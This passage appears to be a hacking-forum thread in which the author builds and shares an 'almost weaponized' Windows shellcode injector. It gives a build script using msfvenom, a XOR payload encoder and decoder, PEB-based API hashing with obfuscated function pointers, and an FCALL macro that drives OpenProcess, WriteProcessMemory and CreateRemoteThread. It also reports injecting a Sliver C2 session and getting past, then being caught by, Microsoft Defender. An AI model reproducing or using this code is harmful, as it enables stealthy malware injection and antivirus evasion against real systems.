As you can see, INCBIN is very easy to use: you just choose a variable name and the path of the file to include, and you get two variables, in my case payload_data and payload_size. The first points to the beginning of the included file and the second holds its size. As a quick test, I spawned notepad.exe and ran the code from an excluded directory. The injection was correct, since the session was created in the C2, but after a few seconds Defender showed a detection and killed notepad.exe (probably dynamic analysis caught Sliver):

_sliver_detection.png


This post is now longer than I expected. Anyone who wants the full code just needs to ask; I will not include it as in the last post because I'm not sure it is helpful. I think the next step will be to add a layer of encoding to the file used with INCBIN and a routine to decode it at runtime.

References:
INCBIN: https://github.com/graphitemaster/incbin
64-Bit Programming Models: Why LP64?: https://unix.org/version2/whatsnew/lp64_wp.html
 
I "finished" this thread injector; it is almost weaponized. People using the tool will just need the software used in the build.sh script:
Bash:
rm -f shellcode
#msfvenom -p windows/x64/exec CMD="cmd.exe" EXITFUNC="thread" > shellcode.bin
gcc hash.c -o hash
./hash > hash.h
gcc encode.c -o encode
./encode shellcode.bin shellcode
x86_64-w64-mingw32-gcc -O3 main.c -o injector.exe
strip -s ./injector.exe
#proxychains curl -T ./injector.exe oshi.at

Usage is very simple: put an x64 payload in the file shellcode.bin and run build.sh; injector.exe will then inject the payload into the <pid> passed on the command line. As an example, I used msfvenom to create payloads that run notepad.exe and cmd.exe (a simple test). All went fine; in the image we can see the calculator executing notepad.exe:
calc.exe.png


The program which encodes the payload is very simple and the code is self-explanatory:
C:
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef XOR_KEY
#define XOR_KEY 0xff
#endif

int main(int argc, char **argv)
{
    int payload_fd;
    int enc_payload_fd;
    unsigned char *payload_map;
    unsigned char *enc_payload_map;
    struct stat statbuf;

    payload_fd = open(argv[1], O_RDONLY);
    fstat(payload_fd, &statbuf);
    enc_payload_fd = open(argv[2], O_RDWR | O_CREAT, S_IRWXU);
    ftruncate(enc_payload_fd, statbuf.st_size);
    payload_map = mmap(NULL, statbuf.st_size, PROT_READ, MAP_PRIVATE, payload_fd, 0);
    enc_payload_map = mmap(NULL, statbuf.st_size, PROT_WRITE, MAP_SHARED, enc_payload_fd, 0);

    for (int i = 0; i < statbuf.st_size; i++) {
        enc_payload_map[i] = payload_map[(statbuf.st_size-1) - i] ^ XOR_KEY;
    }

    munmap(payload_map, statbuf.st_size);
    munmap(enc_payload_map, statbuf.st_size);
    close(payload_fd);
    close(enc_payload_fd);

    return 0;
}

The most interesting new thing in this code is the decode_payload function. I could have used the same routine as the encoder for this specific case, but a different approach worked fine too. Here is the implementation:

C:
void decode_payload(const unsigned char * payload, size_t size)
{
    div_t q;
    unsigned char *ptr;
    
    q = div(size, 2);
    ptr = (unsigned char *)payload;

    if (q.rem != 0)
        ptr[q.quot] ^= XOR_KEY;

    for (int i = 0; i < q.quot; i++) {
        if (ptr[i] == ptr[(size-1)-i]) {
            ptr[i] ^= XOR_KEY;
            ptr[(size-1)-i] ^= XOR_KEY ;   
            continue;
        }
            
        ptr[i] ^= ptr[(size-1)-i];
        ptr[(size-1)-i] ^= ptr[i];
        ptr[i] ^= ptr[(size-1)-i];
        
        ptr[i] ^= XOR_KEY;
        ptr[(size-1)-i] ^= XOR_KEY ;   
    }
}

The changes to main.c were minimal. I will zip all sources and upload them soon. Hopefully it will help someone.
 
thank you so much for the content ^^ , keep on, i really enjoyed reading it...
 
C:
struct func_ptrs {
    unsigned long long rval;
    OpenProcessPtr_t OpenProcessPtr;
    VirtualAllocExPtr_t VirtualAllocExPtr;
    WriteProcessMemoryPtr_t WriteProcessMemoryPtr;
    CreateRemoteThreadPtr_t CreateRemoteThreadPtr;
};

To initialize the struct I introduced the function init_table(), which creates a random 64-bit value, uses this value to encode the pointers returned by get_proc(), and finally stores each pointer in the struct:


C:
void init_table(struct func_ptrs *fptrs)
{
    PEB* ppeb;
    unsigned long long x = 0;

    srand(time(NULL));
    for (int i = 0; i < 8; i++)
        x = x << 8 | ((unsigned long long)rand() & 0xff);
  
    fptrs->rval = x;

    ppeb = get_peb();
    fptrs->OpenProcessPtr =    (OpenProcessPtr_t)(x ^ (unsigned long long)get_proc(ppeb, OpenProcess_HASH));
    fptrs->VirtualAllocExPtr = (VirtualAllocExPtr_t)(x ^ (unsigned long long)get_proc(ppeb, VirtualAllocEx_HASH));
    fptrs->WriteProcessMemoryPtr = (WriteProcessMemoryPtr_t)(x ^ (unsigned long long)get_proc(ppeb, WriteProcessMemory_HASH));
    fptrs->CreateRemoteThreadPtr = (CreateRemoteThreadPtr_t)(x ^ (unsigned long long)get_proc(ppeb, CreateRemoteThread_HASH));

    printf("OpenProcessPtr @ %p\n", fptrs->OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", fptrs->VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", fptrs->WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", fptrs->CreateRemoteThreadPtr);
}

From this point on we have almost everything needed to use the WinAPI, but for the sake of usability I also introduced a convoluted macro, FCALL. It receives the name of a variable of type struct func_ptrs, the name of a field (function pointer), and finally the parameters of the WinAPI function. It expands to the code needed to decode the function pointer, cast it to the correct type and call the respective function:

C:
#define FCALL(fptr, fname, ...) \
    ( _Generic(fptr.fname, \
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ) \
    ) (__VA_ARGS__) )

Even though the macro looks strange because of _Generic and the variadic arguments, it is very easy to use. Here is an example of a call to OpenProcess():


C:
    pid = atoi(argv[1]);
    proc_handle = FCALL(fptrs, OpenProcessPtr,
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid
    );
couldn't understand this code tbh, can u explain it more?
 
Sure, I will do this in a later reply when I have more time. Did you have a problem with a specific part of the code, or do you need a more detailed description of how the quoted code works?
 
i need a more detailed description... if u've any article... especially abt the macro FCALL, and i'm sorry for taking a while to answer... i was kinda busy...
 
When you have trouble understanding a macro, you can instruct GCC to expand macros and show the output. In our case:

Bash:
x86_64-w64-mingw32-gcc main.c -E

Taking this part of source:
C:
FCALL(fptrs, WriteProcessMemoryPtr,
                proc_handle, remote_mem, payload_data, payload_size, &written
    );

GCC will output:

C:
( _Generic(fptrs.WriteProcessMemoryPtr,
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval ),
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval ),
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval ),
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval )
  ) (proc_handle, remote_mem, payload_data, payload_size, &written) )

From here you can see that it expands to a function call. The macro is used so that the function address is decoded automatically by the expression "((unsigned long long)fptrs.WriteProcessMemoryPtr ^ fptrs.rval)" and then cast to the correct type. There are only two "tricky" things about this macro: the use of _Generic to select the correct cast, and the use of __VA_ARGS__ so the macro can handle a different number of arguments, which lets it expand to different function calls. For both subjects I think the references are more useful than a new explanation from me.
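
For readers who have not met these two C features before, here is a minimal standalone sketch of each, unrelated to the project code. All names in it (twice_int, twice_double, text_len, TWICE, APPLY) are hypothetical and exist only for illustration. It needs a C11 compiler, since _Generic was added in C11.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

int twice_int(int x) { return 2 * x; }
double twice_double(double x) { return 2.0 * x; }

size_t text_len(const char *s)
{
    assert(s != NULL);
    return strlen(s);
}

/* _Generic looks at the static type of x at compile time and yields the
 * matching function; the trailing (x) then calls whichever was selected. */
#define TWICE(x) _Generic((x), \
        int: twice_int, \
        double: twice_double \
    )(x)

/* __VA_ARGS__ stands for every argument after fn, however many there are,
 * so one macro can forward to functions with different parameter lists. */
#define APPLY(fn, ...) ((fn)(__VA_ARGS__))
```

With these definitions TWICE(21) calls twice_int, TWICE(1.5) calls twice_double, and APPLY(text_len, "abc") expands to (text_len)("abc"). Only the selected _Generic branch is evaluated, but every branch must still be a valid expression.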

References:
_Generic Selection
Variadic Macros
 

